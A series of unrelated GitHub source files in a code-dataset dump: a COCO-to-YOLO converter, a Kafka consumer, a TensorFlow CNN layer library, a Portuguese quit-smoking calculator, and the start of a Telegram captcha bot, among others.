question_id=answer.question.id)","repo_name":"sungm1nn/Hello","sub_path":"mysite/pybo/views/vote_views.py","file_name":"vote_views.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"71194345641","text":"\"\"\"*********************************************************************************************************************\n* Title: Annotation Conversion: COCO JSON to YOLO Txt\n* Author: Haobin Tan\n* Date: 3. 5. 2022\n* Code version: 0.1\n* Availability: https://haobin-tan.netlify.app/ai/computer-vision/object-detection/coco-json-to-yolo-txt/#reference\n*********************************************************************************************************************\"\"\"\nimport os\nimport json\nfrom tqdm import tqdm\n\n\ndef convert_bbox_coco2yolo(img_width, img_height, bbox):\n x_tl, y_tl, w, h = bbox\n\n dw = 1.0 / img_width\n dh = 1.0 / img_height\n\n x_center = x_tl + w / 2.0\n y_center = y_tl + h / 2.0\n\n x = x_center * dw\n y = y_center * dh\n w = w * dw\n h = h * dh\n\n return [x, y, w, h]\n\n\ndef convert_coco_json_to_yolo_txt(output_path, json_file):\n with open(json_file) as f:\n json_data = json.load(f)\n\n label_file = os.path.join(output_path, \"_darknet.labels\")\n with open(label_file, \"w\") as f:\n for category in tqdm(json_data[\"categories\"], desc=\"Categories\"):\n category_name = category[\"name\"]\n f.write(f\"{category_name}\\n\")\n\n for image in tqdm(json_data[\"images\"], desc=\"Annotation txt for each iamge\"):\n img_id = image[\"id\"]\n img_name = image[\"file_name\"]\n img_width = image[\"width\"]\n img_height = image[\"height\"]\n\n anno_in_image = [anno for anno in json_data[\"annotations\"] if anno[\"image_id\"] == img_id]\n anno_txt = os.path.join(output_path, img_name.split(\".\")[0] + \".txt\")\n with open(anno_txt, \"w\") as f:\n for anno in anno_in_image:\n category = anno[\"category_id\"]\n bbox_COCO = anno[\"bbox\"]\n x, y, w, h = convert_bbox_coco2yolo(img_width, img_height, bbox_COCO)\n f.write(f\"{(category-1)} {x:.6f} {y:.6f} {w:.6f} {h:.6f}\\n\")\n\n print(\"Converting COCO Json to YOLO txt finished!\")\n\n\nif __name__ == '__main__':\n 
convert_coco_json_to_yolo_txt(\"output\", \"annotations_coco.json\")","repo_name":"FilipMikus/Comparison_of_artificial_intelligence_methods_for_handwritten_number_recognition","sub_path":"image_recognition_app/datasets_formats/coco_to_yolo.py","file_name":"coco_to_yolo.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22739347852","text":"from domain.utils.obtain_image import exist, image_obtain\nfrom domain.utils.base64_to_image import to_image\nfrom instructure.storage import save_image\nfrom os import remove\nfrom concurrent.futures import ThreadPoolExecutor\nfrom domain.services.save_image_url_services import save_image_storage_with_url_service\nfrom domain.models.image_entity import ImageModel\nfrom domain.models.image3_entity import Image3Model\nfrom instructure.tynypng import optimize_images\n\ndef get_1_image_service(prompt: str) -> ImageModel:\n    json_image = image_obtain(prompt)\n    image_str = json_image[\"images\"][0]\n    image = to_image(image_str)\n    optimize_images(image[\"id\"])\n    path = save_image(image[\"direction\"], image['id'])\n    remove(image[\"direction\"])\n    image_class = ImageModel(image['id'], path, json_image[\"parameters\"])\n    return image_class\n    \ndef get_3_image_service(\n        init_prompt: str, middle_prompt: str, final_prompt: str\n    ):\n    with ThreadPoolExecutor(max_workers=3) as executor:\n        init_promise = executor.submit(get_1_image_service, init_prompt)\n        middle_promise = executor.submit(get_1_image_service, middle_prompt)\n        final_promise = executor.submit(get_1_image_service, final_prompt)\n        init = init_promise.result()\n        middle = middle_promise.result()\n        final = final_promise.result()\n        images = Image3Model(init, middle, final)\n        return images\n\ndef exit_url_service():\n    return exist()","repo_name":"trueJomi/storage_python","sub_path":"domain/services/image_services.py","file_name":"image_services.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3136301030","text":"import json\nimport logging\nfrom typing import Any, Callable, Dict, List\n\nfrom classic.components import component\nfrom kafka import KafkaConsumer\n\n\ndef deserializer(value: bytes) -> Dict[str, Any]:\n    return json.loads(value.decode('utf-8'))\n\n\nAPI_VERSION_AUTO_TIMEOUT_MS = 20000\nMAX_POLL_INTERVAL_MS = 86400000\nSASL_MECHANISM: str = 'SCRAM-SHA-512'\nSASL_SSL: str = 'SASL_SSL'\n\nlogger = logging.getLogger()\n\n\ndef create_consumer(\n    topic: str,\n    servers: List[str],\n    service: Callable,\n    group_id,\n    ssl_path_certificate: str,\n    user: str,\n    password: str,\n):\n\n    def consume():\n        consumer = KafkaConsumer(\n            bootstrap_servers=servers,\n            value_deserializer=deserializer,\n            auto_offset_reset='earliest',\n            api_version_auto_timeout_ms=API_VERSION_AUTO_TIMEOUT_MS,\n            max_poll_interval_ms=MAX_POLL_INTERVAL_MS,\n            security_protocol=SASL_SSL,\n            sasl_mechanism=SASL_MECHANISM,\n            ssl_check_hostname=False,\n            ssl_cafile=ssl_path_certificate,\n            sasl_plain_username=user,\n            sasl_plain_password=password,\n            group_id=group_id,\n        )\n\n        consumer.subscribe([topic])\n        try:\n            for record in consumer:\n                if record.value:\n                    service.run(record.value)\n                    consumer.commit()\n        except Exception as e:\n            logger.exception('Unexpected error occurred')\n            raise e\n        finally:\n            consumer.close()\n\n    return 
consume\n","repo_name":"AlexTolmy/hackaton","sub_path":"components/exhauster_backend/exhauster/adapters/kafka/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10536149404","text":"def solution(cr, cc, N):\n global grid, ans\n\n check = grid[cr][cc]\n for i in range(cr, cr + N):\n for j in range(cc, cc + N):\n if check != grid[i][j]:\n check = -1\n break\n\n if check == -1:\n ans += \"(\"\n solution(cr, cc, N//2)\n solution(cr, cc+N//2, N//2)\n solution(cr+N//2, cc, N//2)\n solution(cr+N//2, cc+N//2, N//2)\n ans += \")\"\n elif check == 1:\n ans += '1'\n elif check == 0:\n ans += '0'\n\n\nN = int(input())\ngrid = [list(map(int, input())) for _ in range(N)]\n\nans = ''\nsolution(0, 0, N)\nprint(ans)","repo_name":"tsinghua-auto4/ct_note","sub_path":"BOJ/2309/20/김동현_1992_쿼드트리.py","file_name":"김동현_1992_쿼드트리.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"37011723795","text":"import os\nimport algoraphics as ag\n\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\nc = ag.Canvas(400, 400)\n\n###########\n# Shadows #\n###########\n\nx = [\n ag.Circle(c=(100, 150), r=50, stroke=\"#FFDDDD\"),\n ag.Circle(c=(150, 100), r=50, stroke=\"#DDDDFF\"),\n]\nag.set_style(x, \"stroke-width\", 20)\nag.add_shadows(x, stdev=20, darkness=0.5)\n\ny = [[\n ag.Circle(c=(300, 250), r=50, fill=\"#FFDDDD\"),\n ag.Circle(c=(250, 300), r=50, fill=\"#DDDDFF\"),\n]]\n# ag.add_paper_texture(y)\n\n# Note that add_shadows adds shadows to the immediate list elements as\n# wholes, meaning the top circle should not project a shadow onto the\n# one behind it.\nag.add_shadows(y, stdev=20, darkness=0.5)\n\nc.add(x, y)\nc.png(\"png/textures1.png\")\n","repo_name":"daniel-munro/algoraphics","sub_path":"tests/test_textures.py","file_name":"test_textures.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"39724411261","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 17-9-18 下午3:59\n# @Author : MaybeShewill-CV\n# @Site : https://github.com/MaybeShewill-CV/lanenet-lane-detection\n# @File : cnn_basenet.py\n# @IDE: PyCharm Community Edition\n\"\"\"\nThe base convolution neural networks mainly implement some useful cnn functions\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\n\n\nclass CNNBaseModel(object):\n \"\"\"\n Base model for other specific cnn ctpn_models\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def conv2d(inputdata, out_channel, kernel_size, padding='SAME',\n stride=1, w_init=None, b_init=None,\n split=1, use_bias=True, data_format='NHWC', name=None):\n \"\"\"\n Packing the tensorflow conv2d function.\n :param name: op name\n :param inputdata: A 4D tensorflow tensor which ust have known number of channels, but can have other\n unknown dimensions.\n :param out_channel: number of output channel.\n :param kernel_size: int so only support square kernel convolution\n :param padding: 'VALID' or 'SAME'\n :param stride: int so only support square stride\n :param w_init: initializer for convolution weights\n :param b_init: initializer for bias\n :param split: split channels as used in Alexnet mainly group for GPU memory save.\n :param use_bias: whether to use bias.\n :param data_format: default set to NHWC according tensorflow\n :return: tf.Tensor 
named ``output``\n        \"\"\"\n        with tf.variable_scope(name):\n            in_shape = inputdata.get_shape().as_list()\n            channel_axis = 3 if data_format == 'NHWC' else 1\n            in_channel = in_shape[channel_axis]\n            assert in_channel is not None, \"[Conv2D] Input cannot have unknown channel!\"\n            assert in_channel % split == 0\n            assert out_channel % split == 0\n\n            padding = padding.upper()\n\n            # integer division keeps the filter shape integral under Python 3\n            if isinstance(kernel_size, list):\n                filter_shape = [kernel_size[0], kernel_size[1]] + [in_channel // split, out_channel]\n            else:\n                filter_shape = [kernel_size, kernel_size] + [in_channel // split, out_channel]\n\n            if isinstance(stride, list):\n                strides = [1, stride[0], stride[1], 1] if data_format == 'NHWC' \\\n                    else [1, 1, stride[0], stride[1]]\n            else:\n                strides = [1, stride, stride, 1] if data_format == 'NHWC' \\\n                    else [1, 1, stride, stride]\n\n            if w_init is None:\n                w_init = tf.contrib.layers.variance_scaling_initializer()\n            if b_init is None:\n                b_init = tf.constant_initializer()\n\n            w = tf.get_variable('W', filter_shape, initializer=w_init)\n            b = None\n\n            if use_bias:\n                b = tf.get_variable('b', [out_channel], initializer=b_init)\n\n            if split == 1:\n                conv = tf.nn.conv2d(inputdata, w, strides, padding, data_format=data_format)\n            else:\n                inputs = tf.split(inputdata, split, channel_axis)\n                kernels = tf.split(w, split, 3)\n                outputs = [tf.nn.conv2d(i, k, strides, padding, data_format=data_format)\n                           for i, k in zip(inputs, kernels)]\n                conv = tf.concat(outputs, channel_axis)\n\n            ret = tf.identity(tf.nn.bias_add(conv, b, data_format=data_format)\n                              if use_bias else conv, name=name)\n\n            return ret\n\n    @staticmethod\n    def depthwise_conv(input_tensor, kernel_size, name, depth_multiplier=1,\n                       padding='SAME', stride=1):\n        \"\"\"\n\n        :param input_tensor:\n        :param kernel_size:\n        :param name:\n        :param depth_multiplier:\n        :param padding:\n        :param stride:\n        :return:\n        \"\"\"\n        with tf.variable_scope(name_or_scope=name):\n            in_shape = input_tensor.get_shape().as_list()\n            in_channel = in_shape[3]\n            padding = padding.upper()\n\n            depthwise_filter_shape = [kernel_size, kernel_size] + [in_channel, depth_multiplier]\n            w_init = tf.contrib.layers.variance_scaling_initializer()\n\n            depthwise_filter = tf.get_variable(\n                name='depthwise_filter_w', shape=depthwise_filter_shape,\n                initializer=w_init\n            )\n\n            result = tf.nn.depthwise_conv2d(\n                input=input_tensor,\n                filter=depthwise_filter,\n                strides=[1, stride, stride, 1],\n                padding=padding,\n                name='depthwise_conv_output'\n            )\n            return result\n\n    @staticmethod\n    def relu(inputdata, name=None):\n        \"\"\"\n\n        :param name:\n        :param inputdata:\n        :return:\n        \"\"\"\n        return tf.nn.relu(features=inputdata, name=name)\n\n    @staticmethod\n    def sigmoid(inputdata, name=None):\n        \"\"\"\n\n        :param name:\n        :param inputdata:\n        :return:\n        \"\"\"\n        return tf.nn.sigmoid(x=inputdata, name=name)\n\n    @staticmethod\n    def maxpooling(inputdata, kernel_size, stride=None, padding='VALID',\n                   data_format='NHWC', name=None):\n        \"\"\"\n\n        :param name:\n        :param inputdata:\n        :param kernel_size:\n        :param stride:\n        :param padding:\n        :param data_format:\n        :return:\n        \"\"\"\n        padding = padding.upper()\n\n        if stride is None:\n            stride = kernel_size\n\n        if isinstance(kernel_size, list):\n            kernel = [1, kernel_size[0], kernel_size[1], 1] if data_format == 'NHWC' else \\\n                [1, 1, kernel_size[0], kernel_size[1]]\n        else:\n            kernel = [1, kernel_size, kernel_size, 1] if data_format == 'NHWC' \\\n                else [1, 1, kernel_size, kernel_size]\n\n        if isinstance(stride, list):\n            strides = [1, stride[0], stride[1], 1] if data_format == 'NHWC' \\\n                else [1, 1, 
stride[0], stride[1]]\n        else:\n            strides = [1, stride, stride, 1] if data_format == 'NHWC' \\\n                else [1, 1, stride, stride]\n\n        return tf.nn.max_pool(value=inputdata, ksize=kernel, strides=strides, padding=padding,\n                              data_format=data_format, name=name)\n\n    @staticmethod\n    def avgpooling(inputdata, kernel_size, stride=None, padding='VALID',\n                   data_format='NHWC', name=None):\n        \"\"\"\n\n        :param name:\n        :param inputdata:\n        :param kernel_size:\n        :param stride:\n        :param padding:\n        :param data_format:\n        :return:\n        \"\"\"\n        if stride is None:\n            stride = kernel_size\n\n        kernel = [1, kernel_size, kernel_size, 1] if data_format == 'NHWC' \\\n            else [1, 1, kernel_size, kernel_size]\n\n        strides = [1, stride, stride, 1] if data_format == 'NHWC' else [1, 1, stride, stride]\n\n        return tf.nn.avg_pool(value=inputdata, ksize=kernel, strides=strides, padding=padding,\n                              data_format=data_format, name=name)\n\n    @staticmethod\n    def globalavgpooling(inputdata, data_format='NHWC', name=None):\n        \"\"\"\n\n        :param name:\n        :param inputdata:\n        :param data_format:\n        :return:\n        \"\"\"\n        assert inputdata.shape.ndims == 4\n        assert data_format in ['NHWC', 'NCHW']\n\n        axis = [1, 2] if data_format == 'NHWC' else [2, 3]\n\n        return tf.reduce_mean(input_tensor=inputdata, axis=axis, name=name)\n\n    @staticmethod\n    def layernorm(inputdata, epsilon=1e-5, use_bias=True, use_scale=True,\n                  data_format='NHWC', name=None):\n        \"\"\"\n        :param name:\n        :param inputdata:\n        :param epsilon: epsilon to avoid divide-by-zero.\n        :param use_bias: whether to use the extra affine transformation or not.\n        :param use_scale: whether to use the extra affine transformation or not.\n        :param data_format:\n        :return:\n        \"\"\"\n        shape = inputdata.get_shape().as_list()\n        ndims = len(shape)\n        assert ndims in [2, 4]\n\n        mean, var = tf.nn.moments(inputdata, list(range(1, len(shape))), keep_dims=True)\n\n        if data_format == 'NCHW':\n            channel = shape[1]\n            new_shape = [1, channel, 1, 1]\n        else:\n            channel = shape[-1]\n            new_shape = [1, 1, 1, channel]\n        if ndims == 2:\n            new_shape = [1, channel]\n\n        if use_bias:\n            beta = tf.get_variable('beta', [channel], initializer=tf.constant_initializer())\n            beta = tf.reshape(beta, new_shape)\n        else:\n            beta = tf.zeros([1] * ndims, name='beta')\n        if use_scale:\n            gamma = tf.get_variable('gamma', [channel], initializer=tf.constant_initializer(1.0))\n            gamma = tf.reshape(gamma, new_shape)\n        else:\n            gamma = tf.ones([1] * ndims, name='gamma')\n\n        return tf.nn.batch_normalization(inputdata, mean, var, beta, gamma, epsilon, name=name)\n\n    @staticmethod\n    def instancenorm(inputdata, epsilon=1e-5, data_format='NHWC', use_affine=True, name=None):\n        \"\"\"\n\n        :param name:\n        :param inputdata:\n        :param epsilon:\n        :param data_format:\n        :param use_affine:\n        :return:\n        \"\"\"\n        shape = inputdata.get_shape().as_list()\n        if len(shape) != 4:\n            raise ValueError(\"Input data of instancebn layer has to be 4D tensor\")\n\n        if data_format == 'NHWC':\n            axis = [1, 2]\n            ch = shape[3]\n            new_shape = [1, 1, 1, ch]\n        else:\n            axis = [2, 3]\n            ch = shape[1]\n            new_shape = [1, ch, 1, 1]\n        if ch is None:\n            raise ValueError(\"Input of instancebn requires a known channel!\")\n\n        mean, var = tf.nn.moments(inputdata, axis, keep_dims=True)\n\n        if not use_affine:\n            return tf.divide(inputdata - mean, tf.sqrt(var + epsilon), name='output')\n\n        beta = tf.get_variable('beta', [ch], initializer=tf.constant_initializer())\n        beta = tf.reshape(beta, new_shape)\n        gamma = tf.get_variable('gamma', [ch], initializer=tf.constant_initializer(1.0))\n        gamma = tf.reshape(gamma, new_shape)\n        
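# normalize with the per-instance moments, then apply the learned scale and shift\n        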
return tf.nn.batch_normalization(inputdata, mean, var, beta, gamma, epsilon, name=name)\n\n @staticmethod\n def dropout(inputdata, keep_prob, noise_shape=None, name=None):\n \"\"\"\n\n :param name:\n :param inputdata:\n :param keep_prob:\n :param noise_shape:\n :return:\n \"\"\"\n return tf.nn.dropout(inputdata, keep_prob=keep_prob, noise_shape=noise_shape, name=name)\n\n @staticmethod\n def fullyconnect(inputdata, out_dim, w_init=None, b_init=None,\n use_bias=True, name=None):\n \"\"\"\n Fully-Connected layer, takes a N>1D tensor and returns a 2D tensor.\n It is an equivalent of `tf.layers.dense` except for naming conventions.\n\n :param inputdata: a tensor to be flattened except for the first dimension.\n :param out_dim: output dimension\n :param w_init: initializer for w. Defaults to `variance_scaling_initializer`.\n :param b_init: initializer for b. Defaults to zero\n :param use_bias: whether to use bias.\n :param name:\n :return: tf.Tensor: a NC tensor named ``output`` with attribute `variables`.\n \"\"\"\n shape = inputdata.get_shape().as_list()[1:]\n if None not in shape:\n inputdata = tf.reshape(inputdata, [-1, int(np.prod(shape))])\n else:\n inputdata = tf.reshape(inputdata, tf.stack([tf.shape(inputdata)[0], -1]))\n\n if w_init is None:\n w_init = tf.contrib.layers.variance_scaling_initializer()\n if b_init is None:\n b_init = tf.constant_initializer()\n\n ret = tf.layers.dense(inputs=inputdata, activation=lambda x: tf.identity(x, name='output'),\n use_bias=use_bias, name=name,\n kernel_initializer=w_init, bias_initializer=b_init,\n trainable=True, units=out_dim)\n return ret\n\n @staticmethod\n def layerbn(inputdata, is_training, name, scale=True):\n \"\"\"\n\n :param inputdata:\n :param is_training:\n :param name:\n :param scale:\n :return:\n \"\"\"\n\n return tf.layers.batch_normalization(inputs=inputdata, training=is_training, name=name, scale=scale)\n\n @staticmethod\n def layergn(inputdata, name, group_size=32, esp=1e-5):\n \"\"\"\n\n :param inputdata:\n :param name:\n :param group_size:\n :param esp:\n :return:\n \"\"\"\n with tf.variable_scope(name):\n inputdata = tf.transpose(inputdata, [0, 3, 1, 2])\n n, c, h, w = inputdata.get_shape().as_list()\n group_size = min(group_size, c)\n inputdata = tf.reshape(inputdata, [-1, group_size, c // group_size, h, w])\n mean, var = tf.nn.moments(inputdata, [2, 3, 4], keep_dims=True)\n inputdata = (inputdata - mean) / tf.sqrt(var + esp)\n\n # 每个通道的gamma和beta\n gamma = tf.Variable(tf.constant(1.0, shape=[c]), dtype=tf.float32, name='gamma')\n beta = tf.Variable(tf.constant(0.0, shape=[c]), dtype=tf.float32, name='beta')\n gamma = tf.reshape(gamma, [1, c, 1, 1])\n beta = tf.reshape(beta, [1, c, 1, 1])\n\n # 根据论文进行转换 [n, c, h, w, c] 到 [n, h, w, c]\n output = tf.reshape(inputdata, [-1, c, h, w])\n output = output * gamma + beta\n output = tf.transpose(output, [0, 2, 3, 1])\n\n return output\n\n @staticmethod\n def squeeze(inputdata, axis=None, name=None):\n \"\"\"\n\n :param inputdata:\n :param axis:\n :param name:\n :return:\n \"\"\"\n return tf.squeeze(input=inputdata, axis=axis, name=name)\n\n @staticmethod\n def deconv2d(inputdata, out_channel, kernel_size, padding='SAME',\n stride=1, w_init=None, b_init=None,\n use_bias=True, activation=None, data_format='channels_last',\n trainable=True, name=None):\n \"\"\"\n Packing the tensorflow conv2d function.\n :param name: op name\n :param inputdata: A 4D tensorflow tensor which ust have known number of channels, but can have other\n unknown dimensions.\n :param out_channel: number of output 
channel.\n :param kernel_size: int so only support square kernel convolution\n :param padding: 'VALID' or 'SAME'\n :param stride: int so only support square stride\n :param w_init: initializer for convolution weights\n :param b_init: initializer for bias\n :param activation: whether to apply a activation func to deconv result\n :param use_bias: whether to use bias.\n :param data_format: default set to NHWC according tensorflow\n :return: tf.Tensor named ``output``\n \"\"\"\n with tf.variable_scope(name):\n in_shape = inputdata.get_shape().as_list()\n channel_axis = 3 if data_format == 'channels_last' else 1\n in_channel = in_shape[channel_axis]\n assert in_channel is not None, \"[Deconv2D] Input cannot have unknown channel!\"\n\n padding = padding.upper()\n\n if w_init is None:\n w_init = tf.contrib.layers.variance_scaling_initializer()\n if b_init is None:\n b_init = tf.constant_initializer()\n\n ret = tf.layers.conv2d_transpose(inputs=inputdata, filters=out_channel,\n kernel_size=kernel_size,\n strides=stride, padding=padding,\n data_format=data_format,\n activation=activation, use_bias=use_bias,\n kernel_initializer=w_init,\n bias_initializer=b_init, trainable=trainable,\n name=name)\n return ret\n\n @staticmethod\n def dilation_conv(input_tensor, k_size, out_dims, rate, padding='SAME',\n w_init=None, b_init=None, use_bias=False, name=None):\n \"\"\"\n\n :param input_tensor:\n :param k_size:\n :param out_dims:\n :param rate:\n :param padding:\n :param w_init:\n :param b_init:\n :param use_bias:\n :param name:\n :return:\n \"\"\"\n with tf.variable_scope(name):\n in_shape = input_tensor.get_shape().as_list()\n in_channel = in_shape[3]\n assert in_channel is not None, \"[Conv2D] Input cannot have unknown channel!\"\n\n padding = padding.upper()\n\n if isinstance(k_size, list):\n filter_shape = [k_size[0], k_size[1]] + [in_channel, out_dims]\n else:\n filter_shape = [k_size, k_size] + [in_channel, out_dims]\n\n if w_init is None:\n w_init = tf.contrib.layers.variance_scaling_initializer()\n if b_init is None:\n b_init = tf.constant_initializer()\n\n w = tf.get_variable('W', filter_shape, initializer=w_init)\n b = None\n\n if use_bias:\n b = tf.get_variable('b', [out_dims], initializer=b_init)\n\n conv = tf.nn.atrous_conv2d(value=input_tensor, filters=w, rate=rate,\n padding=padding, name='dilation_conv')\n\n if use_bias:\n ret = tf.add(conv, b)\n else:\n ret = conv\n\n return ret\n\n @staticmethod\n def spatial_dropout(input_tensor, keep_prob, is_training, name, seed=1234):\n \"\"\"\n 空间dropout实现\n :param input_tensor:\n :param keep_prob:\n :param is_training:\n :param name:\n :param seed:\n :return:\n \"\"\"\n\n def f1():\n input_shape = input_tensor.get_shape().as_list()\n noise_shape = tf.constant(value=[input_shape[0], 1, 1, input_shape[3]])\n return tf.nn.dropout(input_tensor, keep_prob, noise_shape, seed=seed, name=\"spatial_dropout\")\n\n def f2():\n return input_tensor\n\n with tf.variable_scope(name_or_scope=name):\n\n output = tf.cond(is_training, f1, f2)\n\n return output\n\n @staticmethod\n def lrelu(inputdata, name, alpha=0.2):\n \"\"\"\n\n :param inputdata:\n :param alpha:\n :param name:\n :return:\n \"\"\"\n with tf.variable_scope(name):\n return tf.nn.relu(inputdata) - alpha * 
tf.nn.relu(-inputdata)\n","repo_name":"MaybeShewill-CV/lanenet-lane-detection","sub_path":"semantic_segmentation_zoo/cnn_basenet.py","file_name":"cnn_basenet.py","file_ext":"py","file_size_in_byte":18774,"program_lang":"python","lang":"en","doc_type":"code","stars":2153,"dataset":"github-code","pt":"18"} +{"seq_id":"6392483994","text":"import time\r\n\r\nquitYear = quitMonth = quitDay = quitHour = quitMinute = quitTime = packsPerDay = averagePackCost = smokesInPack = ''\r\n\r\n# Get user quit info\r\n\r\n# Find out when the user quit smoking.\r\nquitYear = input(\"Em que ano tu vais parar de fumar?(Ex.: 2001)\\n\")\r\nquitMonth = input(\"Em que mes tu vais parar de fumar? (1 ao 12)\\n\")\r\nquitDay = input(\"Em que dia tu vais parar de fumar? (1 ao 31)\\n\")\r\nquitHour = input(\"Em que horas tu vais parar de fumar? (0 ao 23)\\n\")\r\nquitMinute = input(\"Em que minuto tu vais deixar de fumar? (0 ao 59)\\n\")\r\n\r\n# Assemble the pieces into a meaningful unit for calculation.\r\nquitTime = (quitYear, quitMonth, quitDay, quitHour, quitMinute, -1, -1, -1, -1)\r\n\r\n# Determine the extent of the self-injury habit.\r\npacksPerDay = input(\"Quantas carteiras de cigarro voce fuma por dia?\\n\")\r\naveragePackCost = input(\"Quando custa o a carteira?\\n\")\r\nsmokesInPack = input(\"Quantos cigarros vem em cada carteira?\\n\")\r\n\r\nprint (quitTime)\r\nprint (\"Este e o seu numero de pacotes por dia: \" + str(packsPerDay))\r\nprint (\"Este e o custo deles: \" + str(averagePackCost))\r\nprint (\"Este e o numero de tragadas por pacote: \" + str(smokesInPack))\r\n\r\nquitTime1 = time.mktime(quitTime)\r\ncurrentTime = time.time()\r\ntimeDifference = currentTime - quitTime1\r\n\r\nyourMinutes = timeDifference / 60\r\nyourHours = yourMinutes / 60\r\nyourDays = yourHours / 24\r\nyourWeeks = yourDays / 7\r\nyourLunarMonths = yourWeeks /4\r\nyourYears = yourWeeks / 52\r\n\r\nsmokesPerDay = packsPerDay * smokesInPack\r\ncigarettesNotSmoked = smokesPerDay * yourDays\r\naddedLife = cigarettesNotSmoked * 11\r\nmoneySaved1 = averagePackCost * packsPerDay\r\nmoneySaved = moneySaved1 * yourDays\r\nyourTimes = (yourMinutes, yourHours, yourDays, yourWeeks, yourLunarMonths, yourYears)\r\nyourTimesLabels = {'Minutos': yourMinutes, 'horas': yourHours, 'dias': yourDays, 'semanas': yourWeeks, 'meses': yourLunarMonths, 'anos': yourYears}\r\n\r\nprint (\"Este sera o tempo de parar: \" + str(quitTime1))\r\nprint (\"Este e o atual tempo: \" + str(currentTime))\r\nprint (\"Este e a diferenca do tempo de parar ate o tempo atual: \" + str(timeDifference))\r\n\r\nprint (\"\\n\")\r\n\r\nfor timeterm, timevalue in yourTimesLabels.items():\r\n print ('%-10s ==> %d' % (timeterm, timevalue))\r\n\r\nprint (\"\\n\")\r\n\r\nprint (\"Voce adiciona \" + str(addedLife) + \" segundos de vida se parar de fumar.\")\r\nprint (\"Voce salva R$ \" + str(moneySaved) + \"se parar de fumar.\")\r\nprint (\"\\n\")\r\n\r\nprint (\"Voce tem fumado livre por \" + str(yourLunarMonths) + \" meses.\")\r\nprint (\"Voce tem fumado livre por \" + str(yourWeeks) + \" semanas.\")\r\nprint (\"Voce tem fumado livre por \" + str(yourDays) + \" dias.\")\r\nprint (\"Voce tem fumado livre por \" + str(yourHours) + \" horas.\")\r\nprint (\"Voce tem fumado livre por \" + str(yourMinutes) + \" minutos.\")\r\n\r\ndummy1 = raw_input(\"Programa encerrado. 
Para sair, tecle ENTER.\")","repo_name":"herrmannjob/DevTraining","sub_path":"Languages/Python/Exercises/PareDeFumar.py","file_name":"PareDeFumar.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38446112495","text":"\"\"\"Captcha welcome bot command\"\"\"\n\nfrom typing import Optional, List\nfrom io import BytesIO\nfrom math import ceil\nimport random\nimport datetime\n\nfrom sadbot.app import App, CHAT_MEMBER_STATUS_RESTRICTED\nfrom sadbot.classes.permissions import Permissions\nfrom sadbot.command_interface import CommandInterface, BOT_HANDLER_TYPE_NEW_USER\nfrom sadbot.message import Message\nfrom sadbot.bot_action import (\n BotAction,\n BOT_ACTION_TYPE_REPLY_IMAGE,\n BOT_ACTION_TYPE_RESTRICT_CHAT_MEMBER,\n BOT_ACTION_PRIORITY_HIGH,\n)\nfrom sadbot.classes.captcha import Captcha\nfrom sadbot.config import (\n CAPTCHA_KEYBOARD_BUTTONS_PER_LINE,\n CAPTCHA_EXTRA_TEXTS_NUMBER,\n CAPTCHA_EXPIRATION,\n)\nfrom sadbot.message_repository import MessageRepository\nfrom sadbot.chat_permissions import ChatPermissions\nfrom sadbot.functions import convert_time\n\n\nclass CaptchaWelcomeBotCommand(CommandInterface):\n \"\"\"This is the captcha welcome bot command class, it 'welcomes' new users lol\"\"\"\n\n def __init__(\n self,\n app: App,\n permissions: Permissions,\n captcha: Captcha,\n message_repository: MessageRepository,\n ):\n \"\"\"Initializes the captcha command\"\"\"\n self.app = app\n self.permissions = permissions\n self.captcha = captcha\n self.message_repository = message_repository\n\n @property\n def handler_type(self) -> int:\n return BOT_HANDLER_TYPE_NEW_USER\n\n @property\n def command_regex(self) -> str:\n \"\"\"Returns the regex for matching new users\"\"\"\n return r\"test\"\n\n def get_keyboard(self, captcha_id: str, captcha_text: str) -> List:\n \"\"\"Returns the inline keyboard for the captcha\"\"\"\n callback_prefix = f\"captcha-{captcha_id}-\"\n keyboard_data = [\n {\"text\": captcha_text, \"callback_data\": callback_prefix + captcha_text}\n ]\n for i in range(0, CAPTCHA_EXTRA_TEXTS_NUMBER):\n random_string = self.captcha.get_captcha_string()\n keyboard_data.append(\n {\n \"text\": random_string,\n \"callback_data\": f\"{callback_prefix}{random_string}\",\n }\n )\n random.shuffle(keyboard_data)\n inline_keyboard = []\n for i in range(\n 0,\n ceil((CAPTCHA_EXTRA_TEXTS_NUMBER + 1) / CAPTCHA_KEYBOARD_BUTTONS_PER_LINE),\n ):\n temp_list = []\n for j in range(\n i * CAPTCHA_KEYBOARD_BUTTONS_PER_LINE,\n i * CAPTCHA_KEYBOARD_BUTTONS_PER_LINE\n + CAPTCHA_KEYBOARD_BUTTONS_PER_LINE,\n ):\n if j > CAPTCHA_EXTRA_TEXTS_NUMBER:\n continue\n temp_list.append(keyboard_data[j])\n inline_keyboard.append(temp_list)\n return inline_keyboard\n\n @staticmethod\n def get_welcome_message(new_user: str) -> str:\n \"\"\"Returns a 'welcome' message lol\"\"\"\n time_string = convert_time(CAPTCHA_EXPIRATION)\n welcome_message_replies = [\n f\"Welcome {new_user}\\nPlease solve the captcha.\",\n f\"\"\"W-w.. welcomee {new_user} ~~ uwu~\\nP-p pweaswe c-c.. *blushing* c- c-an \"\"\"\n + \"\"\"ywou slwolve t-the capthwa for me {new_user} -senpai ~~\"\"\",\n f\"\"\"Hmmmmm. 
